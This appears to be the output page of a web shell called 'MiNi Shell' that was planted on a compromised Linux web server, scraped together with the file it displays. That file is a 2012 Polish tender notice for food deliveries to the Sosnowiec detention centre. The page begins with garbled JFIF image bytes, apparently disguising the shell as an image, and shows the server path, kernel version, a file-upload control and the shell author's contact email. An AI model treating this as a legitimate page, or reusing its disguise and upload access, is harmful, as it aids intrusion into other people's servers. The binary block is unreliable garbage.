JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120917/350400-N-2012.html

<p class="kh_header"><b>Sosnowiec: Postępowanie o udzielenie zamówienia publicznego na Dostawy żywnościowe z grupy towarowej 158 - różne produkty spożywcze na potrzeby Areszt Śledczy w Sosnowcu. Nr sprawy: DKw-220/4/12.</b><br>
<b>Numer ogłoszenia: 350400 - 2012; data zamieszczenia: 17.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Radocha 25, 41-200 Sosnowiec, woj. śląskie, tel. 032 2925501, faks 032 2924877.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego na Dostawy żywnościowe z grupy towarowej 158 - różne produkty spożywcze na potrzeby Areszt Śledczy w Sosnowcu. Nr sprawy: DKw-220/4/12..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> GRUPA I

1.	Cukier	KG	                          9500
2.	Dżem	KG	                                  1200
3.	Fasola JAŚ sredni	KG	          1500
4.	Fasolka konserwowa 	KG	           300
5.	Groch łuszczony	KG	                  1500
6.	Groszek konserwowy 	KG	           450
7.	Koncentrat pomidorowy 30%	KG	    800
8.	Marmolada	KG	                          1200
9.	Miód sztuczny	KG	                   900
10.	Musztarda sarepska	KG	           400
11.	Ocet 10%-spirytusowy	KG	           250
12.	Szczaw konserwowy w słoiku	KG	   300
13.	Leczo Pieczarkowe ( 3 - 13 kg)KG	1  300
14.	Soja - krajanka	KG	                   200
15.	Soja - granulat	KG	                   300
16.	Kotlet sojowy	KG	                   450
17.	Dżem truskawkowy	KG	           200
18.	Herbata granulowana	KG	           300

GRUPA II

1.	Masło roślinne ( kostka 250g)	KG	                                    8000
2.	Margaryna mleczna	KG	                                             800
3.	Olej	L	                                                                    1600
4.	śmietana 30 % ( kartonik 0,5 litra ) 	L	                              750
5.	Serek kanapkowy- 150g o zawartości tłuszczu min. 3,5% KG     1100
6.	ser topiony (100 g)	KG	                                             450
7.	serek homogenizowany (150g)	KG	                             1500
8.	Mleko w proszku opakowanie 20-25 kg	Kg	                     1400
9.	Twaróg półtłusty (250 g)	Kg	                                    1600

GRUPA III

1.	Konserwa Turystyczna (300g) z otwieraczem	KG	                800
2.	konserwa Tyrolska (300g) z otwieraczem	KG	                        800
3.	pasztet drobiowy 130g opak. Aluminiowe z otwieraczem	KG	800
4.	pasztet mazowiecki (360g) z otwieraczem	KG	                        800
5.	przysmak śniadaniowy 300g z otwieraczem	KG	                800

GRUPA IV

1.	Cynamon	KG	                                20
2.	Czosnek mielony	KG	                        40
3.	Przyprawa do zup w proszku	KG	      200
4.	Liść laurowy	KG	                        15
5.	Majeranek	KG	                                15
6.	Papryka mielona ostra	KG	                30
7.	Sos pieczeniowy w proszku	KG	      140
8.	Ziele angielskie	KG	                        25
9.	Sól jadalna	KG	                             2500
10.	Przyprawa w płynie do zup	KG	     1300
11.	Zupa pieczarkowa w proszku	KG	      220
12.	Pieprz mielony czarny	KG	               50
13.	Rosół w proszku	KG	                      150
14.	Żurek	KG	                                      300


GRUPA V

1.	Mąka pszenna poznańska	KG	            2500
2.	Ryż biały długoziarnisty	KG	                    3000
3.	Mąka ziemniaczana	KG	                     250
4.	Kasza jęczmienna	KG	                            3000
5.	Kasza manna	KG	                            1400
6.	Płatki owsiane	KG	                             800
7.	Makaron - świder, nitka, łazanka	KG	   4000

GRUPA VI

1.	Jaja kurze klasy L	SZT.	55000

GRUPA VII

1.	Burger rybny panierowany	KG	750
2.	Śledź mrożony płaty	KG	        900
3.	Śledź solony Matyjas	KG	        450
4.	Ryba mrożona Mintaj tusza	KG	900






GRUPA VIII

1.	Paprykarz szczeciński konserwa 330 g z otwieraczem	KG	                950
2.	Szprot w sosie pomidorowym konserwa 330 g z otwieraczem	KG	650
3.	Sałatka z makreli konserwa 330 g z otwieraczem	KG	                950


GRUPA IX

1.	Woda mineralna - 1,5  L	L	4000.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia.  2)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,  3)Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z przepisami art. 24 ust. l i 2 ustawy - Prawo zamówień publicznych,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy (o niekaralności dot. osób fizycznych, osób wchodzących w skład zarządu, wspólników itd), wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 SIWZ,  
3) podpisane oświadczenie do postępowania o zamówienie publiczne z art. 22 ust. 1 ustawy - Prawo za-mówień publicznych z wykorzystaniem wzoru - załącznik nr 2,  
4) zaakceptowany przez Wykonawcę wzór umowy stanowiący załącznik nr 3. 
5) Formularz cenowy - Załącznik Nr 4</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany umowy w zakresie wynagrodzenia (zmiany cen) w przypadku zmiany ustawowej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.sw.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2012 godzina 09:00, miejsce: Areszt Śledczy
ul. Radocha 25
41-200 Sosnowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cukier	KG	9500
2.	Dżem	KG	1200
3.	Fasola JAŚ sredni	KG	1500
4.	Fasolka konserwowa 	KG	300
5.	Groch łuszczony	KG	1500
6.	Groszek konserwowy 	KG	450
7.	Koncentrat pomidorowy 30%	KG	800
8.	Marmolada	KG	1200
9.	Miód sztuczny	KG	900
10.	Musztarda sarepska	KG	400
11.	Ocet 10%-spirytusowy	KG	250
12.	Szczaw konserwowy w słoiku	KG	300
13.	Leczo Pieczarkowe ( 3 - 13 kg)	KG	1300
14.	Soja - krajanka	KG	200
15.	Soja - granulat	KG	300
16.	Kotlet sojowy	KG	450
17.	Dżem truskawkowy	KG	200
18.	Herbata granulowana	KG	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Masło roślinne ( kostka 250g)	KG	8000
2.	Margaryna mleczna	KG	800
3.	Olej	L	1600
4.	śmietana 30 % ( kartonik 0,5 litra ) 	L	750
5.	Serek kanapkowy- 150g o zawartości tłuszczu min. 3,5%	KG	1100
6.	ser topiony (100 g)	KG	450
7.	serek homogenizowany (150g)	KG	1500
8.	Mleko w proszku opakowanie 20-25 kg	Kg	1400
9.	Twaróg półtłusty (250 g)	Kg	1600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Konserwa Turystyczna (300g) z otwieraczem	KG	800
2.	konserwa Tyrolska (300g) z otwieraczem	KG	800
3.	pasztet drobiowy 130g opak. Aluminiowe z otwieraczem	KG	800
4.	pasztet mazowiecki (360g) z otwieraczem	KG	800
5.	przysmak śniadaniowy 300g z otwieraczem	KG	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cynamon	KG	20
2.	Czosnek mielony	KG	40
3.	Przyprawa do zup w proszku	KG	200
4.	Liść laurowy	KG	15
5.	Majeranek	KG	15
6.	Papryka mielona ostra	KG	30
7.	Sos pieczeniowy w proszku	KG	140
8.	Ziele angielskie	KG	25
9.	Sól jadalna	KG	2500
10.	Przyprawa w płynie do zup	KG	1300
11.	Zupa pieczarkowa w proszku	KG	220
12.	Pieprz mielony czarny	KG	50
13.	Rosół w proszku	KG	150
14.	Żurek	KG	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Grupa V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mąka pszenna poznańska	KG	2500
2.	Ryż biały długoziarnisty	KG	3000
3.	Mąka ziemniaczana	KG	250
4.	Kasza jęczmienna	KG	3000
5.	Kasza manna	KG	1400
6.	Płatki owsiane	KG	800
7.	Makaron - świder, nitka, łazanka	KG	4000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Grupa VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jaja kurze klasy L	SZT.	55000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Grupa VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Burger rybny panierowany	KG	750
2.	Śledź mrożony płaty	KG	900
3.	Śledź solony Matyjas	KG	450
4.	Ryba mrożona Mintaj tusza	KG	900.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Grupa VIII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Paprykarz szczeciński konserwa 330 g z otwieraczem	KG	950
2.	Szprot w sosie pomidorowym konserwa 330 g z otwieraczem	KG	650
3.	Sałatka z makreli konserwa 330 g z otwieraczem	KG	950.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Grupa IX.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Woda mineralna - 1,5  L	L	4000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com